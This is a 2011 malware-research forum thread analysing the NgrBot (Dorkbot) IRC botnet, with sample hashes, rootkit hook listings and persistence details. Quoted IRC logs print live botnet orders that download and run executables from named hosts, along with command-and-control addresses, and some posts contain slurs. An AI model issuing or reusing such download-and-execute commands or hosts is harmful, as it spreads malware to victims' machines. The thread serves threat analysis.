Some lulz:
Code: Select all
* Looking up smellypussy.info
* Connecting to smellypussy.info (115.146.19.158) port 6667...
* Connected. Now logging in...
*
* *** If you are having problems connecting due to ping timeouts, please type /quote pong 20CC5620 or /raw pong 20CC5620 now.
 GARBAGE: 001 get.my.front
* 002 002 002
* 003 003 003
* 004 004 004
* 005 005 005
* 005 005 005
* 005 005 005
/nick n{US|XPa}cpfqbfr
* You are now known as n{US|XPa}cpfqbfr
/join #boss ngrBot

--> Now talking on #boss
* Topic for #boss is: !http.int 6 !http.set wowww!! hahahaha http://smurl.name/3bh6?=facebook_photos_31_05_2011_jpg !msn.int 6 !msn.set wowww!! hahahaha http://x.vu/fbimages1?=facebook_photos_31_05_2011_jpg !mdns http://www.freewebtown.com/usermx/av.txt !dl http://www.freewebtown.com/usermx/nbiz.exe -n !s
* Topic for #boss set by b at Tue May 31 19:04:22 2011

/msg b Hi
>b< Hi
/msg b sup faggot ?
>b< sup faggot ?
* *** You are permanently banned from HTTP (abc)
* Closing Link: n{US|XPa}cpfqbfr[str90-1-82-218-120-144.fbx.proxad.net] (User has been permanently banned from HTTP (abc))


Image

Only the Chan OP can see connected bots, orders are launched with the topic title.

The nbiz.exe on the topic title is compressed with obnubilate online cryptor (onlinecrypter.com)
NgrBot can easily be recognizable with ProcessExplorer
Image

Image

Have fun.
You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
 
Posts: 1642
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 504

Re: NgrBot (aka Win32/Dorkbot.gen!A)

Postby Meriadoc » Wed Jun 01, 2011 1:22 am

From 28th May MD5:680ba129b60d293fb10b77fc00b99799 VT - 14/42 http://www.virustotal.com/file-scan/rep ... 1306665659
You do not have the required permissions to view the files attached to this post.
Who controls the past controls the future
Who controls the present controls the past
User avatar
Meriadoc
 
Posts: 195
Joined: Sat Mar 13, 2010 7:36 pm
Location: Cymru
Reputation point: 87

Re: NgrBot (aka Win32/Dorkbot.gen!A)

Postby Xylitol » Wed Jun 01, 2011 3:45 pm

You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
 
Posts: 1642
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 504

Re: NgrBot (aka Win32/Dorkbot.gen!A)

Postby EP_X0FF » Thu Jun 09, 2011 9:04 am

I just pickup one of this family :D

While work it creates on USB flash shortcuts to all directories in root with funny call to actual malware binary stored as usual in RECYCLER.

Contains some surprises for crackers :)

X-a: b
\\.\PHYSICALDRIVE0 00100 %d. SeShutdownPrivilege NtShutdownSystem This binary is invalid.
Main reasons:
- you stupid cracker
- you stupid cracker...
- you stupid cracker?!


and some rootkit functionally on board included too, so looking for it with something like autoruns is useless idea.

[1368]explorer.exe-->ntdll.dll-->NtEnumerateValueKey, Type: Inline - RelativeJump 0x7C90D2D0-->02176390 [unknown_code_page]
[1368]explorer.exe-->ntdll.dll-->NtQueryDirectoryFile, Type: Inline - RelativeJump 0x7C90D750-->02176640 [unknown_code_page]
[1368]explorer.exe-->ntdll.dll-->NtResumeThread, Type: Inline - RelativeJump 0x7C90DB20-->021753D0 [unknown_code_page]
[1368]explorer.exe-->ntdll.dll-->LdrLoadDll, Type: Inline - RelativeJump 0x7C9163A3-->02175300 [unknown_code_page]
[1368]explorer.exe-->kernel32.dll-->CreateFileA, Type: Inline - RelativeJump 0x7C801A28-->021711C0 [unknown_code_page]
[1368]explorer.exe-->kernel32.dll-->CreateFileW, Type: Inline - RelativeJump 0x7C8107F0-->02171290 [unknown_code_page]
[1368]explorer.exe-->kernel32.dll-->MoveFileW, Type: Inline - RelativeJump 0x7C821249-->02172570 [unknown_code_page]
[1368]explorer.exe-->kernel32.dll-->CopyFileA, Type: Inline - RelativeJump 0x7C8286D6-->02171000 [unknown_code_page]
[1368]explorer.exe-->kernel32.dll-->CopyFileW, Type: Inline - RelativeJump 0x7C82F863-->021710A0 [unknown_code_page]
[1368]explorer.exe-->kernel32.dll-->MoveFileA, Type: Inline - RelativeJump 0x7C835EA7-->02172510 [unknown_code_page]
[1368]explorer.exe-->wininet.dll-->HttpSendRequestA, Type: Inline - RelativeJump 0x771B60A1-->021720A0 [unknown_code_page]
[1368]explorer.exe-->wininet.dll-->InternetWriteFile, Type: Inline - RelativeJump 0x771E8BB9-->021723A0 [unknown_code_page]
[1368]explorer.exe-->wininet.dll-->HttpSendRequestW, Type: Inline - RelativeJump 0x77202EBC-->02172160 [unknown_code_page]
[1368]explorer.exe-->ws2_32.dll-->GetAddrInfoW, Type: Inline - RelativeJump 0x71A92899-->02171D10 [unknown_code_page]
[1368]explorer.exe-->ws2_32.dll-->send, Type: Inline - RelativeJump 0x71A94C27-->02177250 [unknown_code_page]


Binary hides in X:\Documents and Settings\UserName\Application Data. It loads through HKCU Run key, maps payload to processes address spaces and exists.
You do not have the required permissions to view the files attached to this post.
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 4764
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 571

Re: NgrBot (aka Win32/Dorkbot.gen!A)

Postby EP_X0FF » Sun Jun 19, 2011 1:19 pm

Backdoor NgrBot

http://www.virustotal.com/file-scan/report.html?id=07b579442ca01b55f4626e52f81781a06883807e203010d39608db5c2de105cd-1307488247

In attach original dropper, unpacked and unpacked with decrypted strings.
You do not have the required permissions to view the files attached to this post.
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 4764
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 571

Re: NgrBot (aka Win32/Dorkbot.gen!A)

Postby Xylitol » Wed Jul 20, 2011 2:07 pm

VT: 3/43 >> 7.0%
http://www.virustotal.com/file-scan/rep ... 1311018492
VT: 5/43 >> 11.6%
http://www.virustotal.com/file-scan/rep ... 1311163254

193.106.172.77/1337
#gBot gBot

Code: Select all
--> Now talking on #gBot
* Topic for #gBot is: .prot http://dl.dropbox.com/u/27486363/GbotF.exe
* Topic for #gBot set by Amaze at Wed Jul 20 05:53:57 2011
* Amaze gives channel operator status to Amaze
* Amaze sets ban on *!*@67F2E02B.8691F5BC.D0299.IP
<-- You have been kicked from #gBot by Amaze (Amaze)

Hello Amaze :)
You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
 
Posts: 1642
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 504

Re: NgrBot (aka Win32/Dorkbot.gen!A)

Postby Xylitol » Fri Jul 22, 2011 6:04 pm

newest version of ngrbot (and bad guys used a vb crypter on it)

13/43 >> 30.2%
https://www.virustotal.com/file-scan/re ... 1311306469
You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
 
Posts: 1642
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 504

Re: NgrBot (aka Win32/Dorkbot.gen!A)

Postby Xylitol » Tue Jul 26, 2011 3:56 pm

You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
 
Posts: 1642
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 504

Re: NgrBot (aka Win32/Dorkbot.gen!A)

Postby EP_X0FF » Mon Aug 01, 2011 10:41 am

One more in collection.

In attach original and unpacked.
You do not have the required permissions to view the files attached to this post.
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 4764
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 571

Re: NgrBot (aka Win32/Dorkbot.gen!A)

Postby Xylitol » Mon Aug 01, 2011 9:54 pm

You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
 
Posts: 1642
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 504

Next

Return to Malware

Who is online

Users browsing this forum: No registered users and 10 guests